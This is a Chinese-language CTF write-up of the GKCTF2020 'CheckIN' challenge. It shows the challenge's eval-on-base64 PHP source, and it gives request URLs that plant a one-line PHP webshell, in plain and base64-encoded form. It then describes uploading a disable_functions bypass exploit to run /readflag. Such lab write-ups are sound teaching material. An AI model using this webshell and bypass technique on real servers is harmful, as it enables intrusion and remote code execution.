欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

[GKCTF2020]CheckIN bypass_php7_disable_functions

程序员文章站 2022-07-16 15:58:54
...

[GKCTF2020]CheckIN

 
<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }
        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

Ginkgo可以传参,之后参数会保存在当前页面中,传参一句话,使用连接工具连接

查看PHP配置信息:
需要将'phpinfo();'用base64加密成 'cGhwaW5mbygpOw==',再传参
 
 [GKCTF2020]CheckIN bypass_php7_disable_functions
 
写个一句话木马连上看看。
 
 
 
http://c9cf2cc4-7655-4aa5-87be-79e5ae1f7927.node3.buuoj.cn/?Ginkgo=eval($_POST[c]);
 
http://c9cf2cc4-7655-4aa5-87be-79e5ae1f7927.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbY10pOw==
 
 
 [GKCTF2020]CheckIN bypass_php7_disable_functions
 
后台看了一遍'/'目录下有flag相关的文件,但是没有权限
 [GKCTF2020]CheckIN bypass_php7_disable_functions
WP解释说是PHP里面禁用了相关函数,所以我们需要绕过的exp,上传至服务器目录,并执行
文件里面pwn函数后面()中是要放执行的命令,我们改为执行'/readflag'
 [GKCTF2020]CheckIN bypass_php7_disable_functions
之后上传至服务器,这里我们无法直接用Ginkgo来读取exp使其执行
 [GKCTF2020]CheckIN bypass_php7_disable_functions
需要之前的一句话,配合hackbar来执行文件包含,最后读取flag并显示
 
 
相关标签: CTF PHP